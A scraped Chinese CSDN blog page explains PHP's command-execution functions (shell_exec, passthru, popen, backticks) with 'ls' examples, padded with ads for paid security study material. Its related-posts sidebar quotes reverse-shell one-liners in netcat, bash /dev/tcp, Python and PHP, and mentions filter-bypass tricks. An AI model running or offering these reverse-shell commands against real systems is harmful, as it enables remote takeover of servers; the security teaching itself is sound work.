常用的PHP命令执行函数及利用方式_< php echo shell_exec(‘echo kksdfdfg md5sum‘)(1)

最新推荐文章于 2024-05-01 17:18:56 发布
最新推荐文章于 2024-05-01 17:18:56 发布
阅读量824 收藏 7
点赞数 13
分类专栏: 2024年程序员学习 文章标签: php 网络 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ccc6553584/article/details/137999693
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

shell_exec();

shell_exec()函数可以执行系统命令, 但它不会直接输出执行的结果, 而是返回一个字符串类型的变量来存储系统命令的执行结果, 在参数中传递需要执行的系统命令即可

echo shell_exec('ls');

passthru();

passthru()函数可以执行系统命令, 并将执行结果输出到页面中, 与system()函数不同的是, 它支持二进制的数据, 更多的用于文件, 图片等操作, 使用时直接在参数中传递字符串类型的系统命令即可

passthru('ls');

popen();

popen()函数可以执行系统命令, 但不会输出执行的结果, 而是返回一个资源类型的变量用来存储系统命令的执行结果, 需要配合fread()函数来读取命令的执行结果

$result = popen( ‘ls’ , ‘r’ );
        参数1:字符串类型,需要执行的命令
        参数2:字符串类型,模式
        返回值:资源类型,命令执行的结果
echo fread( $result , 100 );
        参数1:资源类型,需要读取的文件指针
        参数2:int类型,读取n个字节
        返回值:字符串类型,读取的文件内容

echo fread(popen('ls','r'),100);

反引号``

反引号可以执行系统命令, 但它不会输出结果, 而是返回一个字符串类型的变量, 用来存储系统命令的执行结果, 可单独使用, 也可配合其他命令执行函数使用来绕过参数中的过滤条件

echo `ls`;

一、网安学习成长路线图

网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的,要学会跟着一起敲,要动手实操,才能将自己的所学运用到实际当中去,这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)
img

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

(备注网络安全)**
[外链图片转存中…(img-eKJV8gRm-1713595847823)]

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

36氪(36Kr)频道首页
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
phpshell_exec使用,php shell_exec() 命令用法_PHP教程
weixin_39921131的博客
03-17 1048
$bf = new chargen(2); // new chargen object, length 2$bf->generate("whois"); // generate chars and call whois functionfunction whois($str){$domain = $str.".com";$retval = shell_exec("whois $domain"...
PHP中遇到BOM、<feff>编码导致json_decode函数无法解析问题
10-25
主要介绍了PHP中遇到BOM、编码导致json_decode函数无法解析问题,json无法正常解析的同学可以看一下,是不是看不见的BOM编码导致的问题,需要的朋友可以参考下
PHP 反引号运行Shell命令,C程序
weixin_34092370的博客
08-10 138
/********************************************************************* * PHP 反引号运行Shell命令,C程序 * 说明: * 之前没有注意到PHP可以直接运行反引号来执行shell命令,这个倒是让 * 代码简洁了不少,因为最近在PHP里面执行shell命令用的...
详解PHP中如何执行系统命令
最新发布
菜鸟教程
05-01 52
教程下载地址: 网赚博客https://www.piaodoo.com/创业项目排行榜前十名https://www.piaodoo.com/
php中``反引号的作用
真正的大师,永远都怀着一颗学徒的心。
07-10 3995
文章目录一、反引号的作用二、反引号位置 一、反引号的作用 1.反引号常见在SQL语句中来包含关键字,比如 $sql = "select `user`,username from `Content`"; 加上反引号就不会有因为字段是关键字而出错的问题。    为了保险起见,我们建议在所有字段中都加上反引号,即上面的SQL建议写成 $sql = "select `user`,`username` from `Content`"; 2.反引号还有种功能是执行系统命令,比如: echo `ipconfig` .
php 反引号用法,shell中单引号、双引号、反引号的使用
weixin_34621186的博客
03-10 363
在编写shell脚本时,会经常地使用到单引号、双引号、反引号这些特殊的符号。它们在shell中有着不同的作用,但容易被误用和引起混乱。简单总结一下三者的使用和区别。单引号它关闭shell中所有的特殊符号使用和解释,即单引号间的内容全部以普通字符的含义进行文本使用和解释,不管是特殊字符 $ ,还是转义字符之类的。例子:~$ a=12;test='this is a $a \$ `date`';ech...
php中反引号及双引号中的反引号
bjgfs的专栏
02-20 2455
<?php $x = `date`; echo $x; ?> 结果Sat 20 Feb 2021 03:01:12 AM UTC <?php $x = "输出字符 `date`"; echo $x; ?> 结果:输出字符 `date`" <?php function tablename($table) { return "`{$GLOBALS['_W']['config']['db']['master']['tablepre']}{$t...
PHPecho,print_r与var_dump区别分析
01-21
三者都是具有输出功能的php语句,但print_r(expression),var_dump(expression)是函数echo只是语言结构,不是函数,因此不能作为表达式的一部分。 对于操作php的8种数据类型来说: ① echo 用于输出数值变量或者是...
PHP启动windows应用程序、执行bat批处理、执行cmd命令的方法(exec、system函数详解)
12-17
exec 或者 system 都可以调用cmd 的命令 直接上代码: 复制代码 代码如下: <?php /** 打开windows的计算器 */ exec(‘start C:WindowsSystem32calc.exe’); /** php生成windows的批处理文件后,再执行这...
php输出echo、print、print_r、printf、sprintf、var_dump的区别比较
01-20
用.net开发已经5年了,最近突然想接触一下。net以外的东西,于是乎就来看看php了。在学习php中首先看看几个输出函数。一、echoecho() 实际上不是一个函数,是php语句,因此您无需对其使用括号。不过,如果您希望向 ...
shell-exec:使用PHP组装命令并在Shell执行更容易
05-12
使用PHP组装命令并在Shell执行更容易 安装 通过作曲家。 composer require technodelight/shell-exec 用法 <?php use Technodelight \ ShellExec \ Command ; use Technodelight \ ShellExec \ Exec ; $ ...
PHP命令执行的几种姿势总结(一)
csd_ct的专栏
11-07 3244
命令执行是web攻击中常用的手法之一,在PHP中,可调用以下函数来实现命令执行,如 1、exec() exec函数用的较少,主要是因为该函数默认返回值是执行结果的最后一行,并不会有全部的执行结果。如果要打印执行结果,需遍历打印output数组, 1.1 函数原型 string exec ( string command, array &output, int &return_var) //command参数是要执行命令 //output数组是保存输出结果 //return_va
PHP常见的命令执行函数与代码执行函数_php命令执行函数
m0_60721695的博客
04-06 1029
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。使用用户自定义的比较函数对数组排序,并保持索引关联(不为元素分配新的键)。将用户自定义函数作用到数组中的每个值上,并返回用户自定义函数作用后的带有新值的数组。回调函数接受的参数数目应该和传递给 array_map() 函数的数组数目一致。这里的 assert 是被调用的回调函数,其余为回调函数的参数。将传入的参数作为数组的第一个值传递给assert函数命令执行:cmd=system(whoami)
PHP代码、命令执行及绕过
qq_46001025的博客
10-15 615
NaN(Not a Number,非数)是计算机科学中数值数据类型的一类值,表示未定义或不可表示的值。常在浮点数运算中使用。Linux下支持glob通配符代替 . 或者叫 period,它的作用和source一样,就是用当前的shell执行一个文件中的命令,例如 .file 就是执行file文件中的命令。数组(Array)的第一个字母是A,在php中,如果强制连接数组和字符串的话,数组会转换成字符串,值为Array;sh a-------------------sh会把 a 里面的每行内容当命令执行
PHP命令执行
sca7tered的博客
10-02 897
PHP命令执行 主要函数 代码执行函数 ${} php复杂变量 <?php ${phpinfo()}; {KaTeX parse error: Expected 'EOF', got '}' at position 12: {getname()}}̲ => {s1ye} =>echo "s1ye";,可以发现先执行了getname函数并输出了“s1ye”,接着才执行echo(优先级)。 $str = "{${phpinfo()}}",花括号定义了变量的边界,因此该条语句先执行括号中内容,
PHP执行外部命令函数盘点
xiaoweids的博客
06-04 304
system()输出并返回最后一行shell结果。exec()不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面。passthru()只调用命令,把命令的运行结果原样地直接输出到标准输出设备上...
详解php://filter以及死亡绕过
热门推荐
woshilnp的博客
05-25 1万+
详解php://filter以及死亡绕过 php://filter PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。 php:// — 访问各个输入/输出流(I/O streams) php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_ge
PHP中的命令执行与代码执行
qq_51754713的博客
10-04 3173
title: PHP中的命令执行与代码执行 data: 2021-09-15 tags: CTF-web PHP中的命令执行与代码执行 最近在复习之前学过得知识点。因为之前是0基础来学习的,所以很多东西可能是没有弄懂的。现在重新回顾一下命令执行这一块。学到了不少的知识。 然后题目的话全都是来源于CTFSHOW的web入门。 对我这种新手来说真是太友好了! 命令执行与代码执行PHP中我们首先要搞清楚什么是代码执行,什么是命令执行。 通俗一点讲,代码执行执行PHP代码。命令执行执行linux系统下.
反弹shell常用命令
07-30
反弹shell是指通过一台远程主机将命令行控制权返回到本地主机上。常见的反弹shell命令包括: 1. Netcat反弹shell: ``` 本地监听:nc -lvp <本地端口号> 远程连接:nc <本地IP地址> <本地端口号> -e /bin/bash ``` 2. Bash反弹shell: ``` bash -i >& /dev/tcp/<本地IP地址>/<本地端口号> 0>&1 ``` 3. Python反弹shell: ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<本地IP地址>",<本地端口号>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` 4. PHP反弹shell: ``` php -r '$sock=fsockopen("<本地IP地址>",<本地端口号>);exec("/bin/sh -i <&3 >&3 2>&3");' ``` 请注意,在实际使用中请合法合规,切勿用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值